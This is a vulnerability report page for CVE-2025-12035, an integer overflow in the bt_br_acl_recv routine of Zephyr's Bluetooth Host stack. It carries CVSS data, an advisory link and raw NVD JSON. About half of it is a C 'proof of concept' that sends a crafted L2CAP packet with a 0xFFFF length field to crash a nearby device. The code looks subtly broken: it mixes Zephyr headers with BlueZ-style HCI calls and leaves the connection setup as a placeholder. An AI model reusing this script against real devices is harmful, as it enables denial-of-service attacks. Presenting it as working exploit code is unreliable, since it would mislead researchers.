Security Vulnerability Report
CVE-2025-12035 CVSS 6.5 MEDIUM

CVE-2025-12035

Published: 2025-12-15 20:15:49
Last Modified: 2026-04-15 00:35:42

Description

An integer overflow condition exists in the Bluetooth Host stack, within the bt_br_acl_recv routine, a critical path for processing inbound BR/EDR L2CAP traffic.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Zephyr Project RTOS (affected versions must be checked against the official security advisory)
Devices using the Zephyr Bluetooth Host Stack (with BR/EDR L2CAP enabled)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
// CVE-2025-12035 PoC - Integer overflow in Zephyr bt_br_acl_recv
// This PoC demonstrates the vulnerability concept (for educational purposes only)
#include <stdio.h>
#include <stdint.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/l2cap.h>

// Malicious L2CAP packet with oversized length field
uint8_t malicious_l2cap_packet[] = {
    // L2CAP Header
    0x02, 0x00,  // Connection-oriented channel ID
    0xFF, 0xFF,  // Length field: 0xFFFF - triggers overflow when processed
    // Payload that will be processed with wrong length
    0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00,
    0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00
};

void send_malicious_packet(int sock) {
    printf("[*] Sending malicious L2CAP packet with oversized length...\n");
    printf("[*] Length field: 0xFFFF (65535)\n");
    printf("[*] This may cause integer overflow in bt_br_acl_recv\n");

    // Send the crafted packet
    send(sock, malicious_l2cap_packet, sizeof(malicious_l2cap_packet), 0);

    printf("[+] Packet sent. Monitor target for crash or unexpected behavior.\n");
}

int main() {
    printf("CVE-2025-12035 PoC - Zephyr bt_br_acl_recv Integer Overflow\n");
    printf("Target: Zephyr Project Bluetooth Host Stack\n");
    printf("Vulnerable Function: bt_br_acl_recv\n\n");

    // Initialize Bluetooth connection to target
    int bt_sock = bt_hci_open_dev(0);
    if (bt_sock < 0) {
        fprintf(stderr, "[-] Failed to open Bluetooth device\n");
        return 1;
    }

    // Connect to target device (must be in range)
    // ... connection setup code ...

    send_malicious_packet(bt_sock);

    bt_hci_close_dev(bt_sock);
    return 0;
}

// Note: Actual exploitation requires:
// 1. Proximity to target (Bluetooth range)
// 2. Active BR/EDR connection to target
// 3. Knowledge of target's Bluetooth address
```

References

https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-p793-3456-h7w3 (source: [email protected])

Weakness: CWE-190 (Integer Overflow or Wraparound)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12035",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-15T20:15:48.597",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An integer overflow condition exists in Bluetooth Host stack, within the bt_br_acl_recv routine a critical path for processing inbound BR/EDR L2CAP traffic."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "ADJACENT_NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-190"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-p793-3456-h7w3",
        "source": "[email protected]"
      }
    ]
  }
}
```